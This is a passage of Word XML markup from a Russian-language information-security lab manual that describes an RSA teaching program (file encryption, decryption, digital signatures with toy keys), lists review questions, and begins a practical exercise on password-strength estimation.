        <w:t xml:space="preserve">Закладка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">«Алгоритм </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Представлены краткие сведения о механизме шифрования данных по алгоритму </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и дан простой пример работы алгоритма для небольших (от 0 до 15) чисел. По нажатию кнопки «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ОК</w:t>
      </w:r>
      <w:r>
        <w:t>» (или «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB0648">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t>») в пошаговом режиме представляется процесс зашифрования и расшифрования введенного числа, при этом на кнопке отражается номер шага. На любом шаге в поле ввода можно ввести новое число и начать процесс заново.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Закладка «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Простые числа</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Т.к. алгоритм </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> основан на использовании простых чисел, то здесь программа по нажатию кнопки «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Старт</w:t>
      </w:r>
      <w:r>
        <w:t>» находит все простые числа до указанного предела. На основании этого набора выбираются (кнопка «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Поиск</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">») числа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, для которых определяются </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB0648">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>, удовлетворяющие условию:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FB0648" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">s*t = 1 mod [(p-1)*(q-1)], </w:t>
      </w:r>
      <w:r>
        <w:t>где</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> s,t &lt;r, r = p*q.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Закладка «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Зашифрование файлов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В этом разделе производится наглядное зашифрование файлов по алгоритму </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSA</w:t>
      </w:r>
      <w:r>
        <w:t>. При нажатии кнопки «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Файл</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">» пользователю представляется стандартное диалоговое окно открытия файла, где он может выбрать любой файл. Если выбран текстовый файл, то его содержимое будет отражено в соответствующем окне. Пара чисел </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> является открытым ключом и служит для шифрования файла. Этот процесс запускается по кнопке «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Зашифровать</w:t>
      </w:r>
      <w:r>
        <w:t>». Во время работы в нижней части формы отражается ход выполнения зашифрования. В таблице также отражается содержимое шифруемого файла в символьном и байтовом виде, а также в кодированном виде. После завершения пользователю сообщаются путь и имя файла, где была сохранена зашифрованная информация (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>*.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rsa</w:t>
      </w:r>
      <w:r>
        <w:t>). Полученный файл имеет в два раза большую длину, чем исходный.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Закладка «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Расшифрование файлов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">» </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Здесь производится расшифрование файлов, зашифрованных по алгоритму </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSA</w:t>
      </w:r>
      <w:r>
        <w:t>. По нажатию кнопки «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Файл</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">» появляется стандартное диалоговое окно открытия файла, где отражаются только файлы с расширением </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rsa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> При необходимости пользователь может отобразить все файлы. Выбранный файл представляется в виде зашифрованных слов в десятичном виде. После ввода закрытого ключа (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>) и нажатию кнопки «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Расшифровать</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">» происходит расшифрование файла. В таблице выдается расшифрованный байт и символ, ему соответствующий. После завершения процесса программа сообщает имя файла с расшифрованной </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>информацией (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>filename</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>_1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:r>
        <w:t>) и путь к нему, а также его содержимое. Размер этого файла в два раза меньше размера зашифрованного.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Закладка «Электронная подпись»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>В этом разделе пользователю рассказывается о принципе создания электронной подписи при передаче сообщений. Принцип электронной подписи основан на том, что открытый ключ известен всем, а закрытый ключ – только отправителю сообщения. Отправитель при посылке сообщения зашифровывает с его помощью какую-либо сигнатуру своего сообщения и добавляет полученное число в сообщение. Получатели расшифровывают его с помощью открытого ключа, подсчитывают сигнатуру и сравнивают полученные числа. Если числа совпадают, сообщение (или авторство отправителя) достоверно, если сигнатуры не совпадают, значит, сообщение ложно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для примера используется в качестве открытого ключа получателей пара чисел </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=55 и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=221, в качестве закрытого ключа отправителя пара чисел </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=7 и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>=221.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Закладка «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Отладка</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>В этом разделе пользователь может проверить на правильность выбранные им числа</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>а также просто возводить любые числа от 0 до 999 в любую степень, и брать модуль от полученного результата. Результат возведения представляется не в экспоненциальной форме, что характерно для больших чисел, а в обычном виде без округления.</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jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Алгоритм цифровой подписи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSA</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005067E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(самостоятельная работа)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Алгоритм цифровой подписи Эль Гамаля.</w:t>
      </w:r>
      <w:r w:rsidRPr="005067E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(самостоятельная работа)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Отечественный стандарт цифровой подписи.</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pacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Генерация и хранение ключей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Распределение ключей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Особенности функционирования межсетевых экранов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Фильтрующие маршрутизаторы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5            Опишите алгоритм шифрования </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSA</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Содержание отчета и его форма</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Выполнение задания с оценкой является заключительным действием обучаемого с системой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Индивидуальные задания для тренировочного и контрольного тестирования выдаются системой автоматически по мере обращения за ними.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af7"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af7"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af7"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="l8"/>
      <w:bookmarkEnd w:id="120"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическая работа № 8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>«Количественная оценка стойкости парольной защиты»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Цель работы</w:t>
      </w:r>
      <w:r>
        <w:t>: реализация простейшего генератора паролей, обладающего требуемой стойкостью к взлому.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc3811328"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Теоретическое обоснование</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Подсистемы идентификации и аутентификации пользователя играют очень важную роль в системах защиты информации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Стойкость подсистемы идентификации и аутентификации</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пользователя в системе защиты информации (СЗИ) во многом определяет устойчивость к взлому самой СЗИ. Данная стойкость определяется гарантией того, что злоумышленник не сможет пройти аутентификацию, присвоив чужой идентификатор или украв его.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
